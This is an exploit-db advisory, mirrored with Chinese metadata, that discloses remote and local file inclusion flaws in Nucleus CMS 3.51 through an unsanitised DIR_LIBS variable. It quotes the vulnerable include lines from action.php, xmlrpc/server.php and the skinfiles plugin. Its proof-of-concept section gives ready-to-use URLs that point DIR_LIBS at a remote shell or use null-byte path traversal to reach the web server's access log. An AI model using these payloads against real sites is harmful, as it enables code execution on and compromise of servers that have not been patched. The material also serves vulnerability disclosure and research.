Nucleus CMS 3.51 (DIR_LIBS) – Multiple Vulnerabilities

  • 作者: eidelweiss
    日期: 2010-04-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12241/
  • ########################################################
Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
########################################################
 
 
 __________ 
/\_`\ /\ \__/\ \__/\ \
\ \ \L\_\_______\ \ \/'\ /\_\_____\ \ ,_\ \ \_____
 \ \_\/\ \/\ \/'___\ \ , < \/\ \ /' _ `\/'_ `\ \ \ \/\ \_ `\/'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\__/
 \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/\/___/\/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/ 
\_/__/
 ____________ Author:eidelweiss
/\ \__/\ \/\ \/\_\
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \_____ _____ ____ 
 \ \ \ \ \ \ \/'__`\ \ '__`\ \ \__ \/\ '__`\/\ '__`\/',__\
\ \ \_/ \_\ \/\__/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
 \ `\___x___/\ \____\\ \_,__/\ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/\/____/ \/___/\/_/\/_/\ \ \/\ \ \/\/___/
 \ \_\ \ \_\
\/_/\/_/
 
 
[+]Software:Nucleus CMS
[+]Version:	Nucleus v3.51 (Other or lower version may also be affected)
[+]License: 	GNU/GPL (Free Software)
[+]Homepage:	http://nucleuscms.org/download.php
[+]Download:	http://prdownloads.sourceforge.net/nucleuscms/nucleus3.51.zip?download
 ########################################################
 
[!]Discovered:	eidelweiss
[!]Contact:	eidelweiss[at]cyberservices[dot]com
[!]Thank`s:	sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
		JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)
 
########################################################
 
-=[Description]=-
 
Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. (PHP4/MySQL)

########################################################
 
	-=[VUln Code]=-
**********************************
[-][path_to_nucleus]/action.php

$CONF = array();
require('./config.php');

// common functions
include_once($DIR_LIBS . 'ACTION.php');

$action = requestVar('action');
$a =& new ACTION();
$errorInfo = $a->doAction($action);

**********************************
[-][path_to_nucleus]/nucleus/xmlrpc/server.php

$CONF = array();
require("../../config.php");	// include Nucleus libs and code
include($DIR_LIBS . "xmlrpc.inc.php");
include($DIR_LIBS . "xmlrpcs.inc.php");

**********************************
[-][path_to_nucleus]/nucleus/plugins/skinfiles/index.php

 	$strRel = '../../../'; 
	require($strRel . 'config.php');
	include($DIR_LIBS . 'PLUGINADMIN.php');

########################################################
 
	-=[ P0C ]=-
 
	Http://127.0.0.1/[path_to_nucleus]/action.php?DIR_LIBS= [inj3ct0r sh3ll]
 
	Http://127.0.0.1/[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS= [inj3ct0r sh3ll]

	Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00
				or
	Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=[lfi]%00

###############################=[E0F]=###################################